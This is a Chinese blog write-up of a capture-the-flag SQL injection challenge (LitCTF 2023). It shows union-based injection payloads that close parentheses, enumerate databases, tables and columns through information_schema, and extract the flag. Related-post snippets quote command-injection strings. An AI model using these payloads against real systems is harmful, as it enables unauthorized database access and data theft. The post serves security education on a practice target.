【CTF Web】NSSCTF 3868 [LitCTF 2023]这是什么?SQL !注一下 !Writeup(SQL注入+报错注入+括号闭合)

于 2024-05-22 13:15:17 发布
阅读量470 收藏 4
点赞数 10
分类专栏: CTF Writeup 文章标签: sql 数据库 web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34988204/article/details/137996498
版权

[LitCTF 2023]这是什么?SQL !注一下 !

为了安全起见多带了几个套罢了o(▽)q
出题人 探姬

解法

先试试这个:

)))))) or 1=1 --

有结果了,但是这个 flag 是假的。

flag 可能在其他表里。先用 hackbar 爆库名。

1)))))) union select 1,group_concat(schema_name) from information_schema.schemata --+

爆表名。

1)))))) union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctftraining' --+

ctftraining 库中发现一个叫 flag 的表。

爆列名。

1)))))) union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctftraining' --+

列名也叫 flag。

1)))))) UNION SELECT 1, flag FROM ctftraining.flag; --+

取得 flag。

Flag

NSSCTF{63d1b3ba-d5d7-420d-9276-c98150270782}

声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任

HEX9CF
关注
  • 10
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
sql注入攻击流量情况
07-18
sql注入攻击流量情况
ctfshow-WEB-web12( 利用代码执行漏洞读取敏感文件)
热门推荐
wangyuxiang946的博客
09-06 1万+
ctf.show WEB模块第12关是一个代码执行漏洞, flag藏在根目录下的一个文件中, 读取文件内容接口过关 进入页面后, 只有一句话 where is the flag? 按照以往的经验, 线索肯定就藏在前端页面的源代码中 右键检查或者按F12, 进入开发者模式, 或者直接右键查看网页源代码, 源码的释中提示了 cmd, 是在暗示我们利用代码执行漏洞 传入cmd参数, 验证一下代码执行漏洞 ?cmd=phpinfo(); 成功显示出php信息, 说明...
CTFSHOW系列-web12(信息收集-网站公开信息泄露)
最新发布
siu~
11-24 616
CTFSHOW系列解题思路
[XCTF攻防世界]simple_php|baby_web|command_execution|xff_referer|simple_js|php_rce|Web_php_include|做题笔记
明裕学长的博客
03-17 149
所以,这里我们既要保证输出$a,$b,又要保证$b是数字,那么就用到php的弱类型比较了。之后使用127.0.0.1|cat ../../../home/flag.txt。发现会自动重定向到1.php说明有问题我们打开开发者工具中的网络看看。我们在ping中127.0.0.1|ls../../../home/发现index.php确实存在接着我们就看到了flag。如果$a等于0 and $a,输出$flag1。如果$b>1234,输出$flag2。发现包含了config.php。这题其实就是一个命令入。
ctfshow-web10 with rollup 绕过
HAI_WD的博客
08-21 206
WITH ROLLUP是一种在SQL查询结果中使用的特殊子句,它可用于生成分组列的总计行。使用WITH ROLLUP,可以在查询结果中添加一个额外的行,显示分组结果的总计值。也就是说如果通过with rollup分组后为空,那我们的输入也为空,那么此时就可以进行绕过了。看到这个源码,可以看到只能是通过满足下面的条件来拿到flag,并且很多关键字都被拦截了。这里需要介绍一下WITH ROLLUP。这里还是使用/**/进行绕过空格。
CTFSHOW web入门——web10
m0_74093152的博客
02-05 228
CTFSHOWweb入门——web10
SQL注入原理及PHP防入代码.pdf
03-31
SQL注入基本概念,原理,防入php代码以及 相关的图片实例,具体可下载查看。
SQL注入漏洞演示源代码
07-15
SQL注入漏洞演示源代码 更多免费资源请查看:http://download.csdn.net/user/php_fly
CTF web安全经典例题讲解
10-22
该内容为CTF赛题web安全经理例题讲解,包含sql注入,密码学、文件上传,提权、抓包改包等多种题型讲解,图文结合,适合新手学习。
SQL注入技巧2-常用技巧总结(攻击向量)
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的盲技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
SQL注入技巧-盲暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的盲技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
CTF中几种通用的sql手法和入的一些tips1
08-03
2、使场景 2、使场景 2、原理分析 3、使场景 2、regexp 盲是来实验吧道题 3、union 盲利起来较简单,就是利上说的那些条件进,例是来蓝鲸
jsql-injection:jSQL Injection是用于自动SQL数据库入的Java应用程序
02-02
Netezza,NuoDB,Oracle,PostgreSQL,Presto,SQLite,SQL Server,Sybase,Teradata和Vertica 多种入策略:正常,错误,堆叠,盲和时间各种入过程:默认,Zip,Dios 用于SQL和篡改脚本的沙箱列出以
sql注入工具sqlmap
06-16
sqlmap是一个自动化的sql注入渗透工具,指纹检测、入方式、入成功后的取数据等等都是自动化的,甚至还提供了一个字典来将取回来的hash爆破,是ctf sql注入题的必备帮手
XCTF Web 新手区007:simple_php
立志成为最会敲代码的dancer,最会locking的程序猿
04-01 206
题目: WP: 本题考察PHP类型比较 附上php函数转化的形式 :即数字和字符混合的字符串转换为整数后只保留数字 <?php $str="123.9abc"; $int=intval($str); //转换后数值:123 $float=floatval($str); //转换后数值:123.9 $str=...
网络安全未来十年会很吃香吗?跟当年的Java开发比如何?
QXXXD的博客
02-02 817
网络安全入门到底是先学编程还是先学计算机基础?
CTFshow-web-web12
qq_68581192的博客
10-20 76
highlight_file()函数可以用于将一个PHP文件的代码高亮显示,并输出到页面上或者保存到文件中。利用burpsuite进行抓包,发现是get传参。glob()函数返回匹配指定模式的文件名或目录。glob(“.txt”)匹配以txt后缀的文件。我们使用高亮函数,将长的文件显示一下。我们将当前目录下的文件打印出,输入。php中有个函数glob();glob(“”)匹配任意文件。尝试远程代码执行,传入参数。查看源代码,发现有个提示。
ctf.show_web10
m0_56107268的博客
05-13 343
<?php $flag=""; function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return preg_replace($regex,"",$strParam); } if (!$con) { die('C.
ctf sql注入题目
09-15
CTF(Capture The Flag)中的SQL注入题目提供了一个模拟真实情境下的网络安全挑战,旨在测试参与者对于SQL注入漏洞的理解和应用能力。以下是一些CTF SQL注入题目的例子: 1. BUUCTF-[极客大挑战 2019]EasySQL 这是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值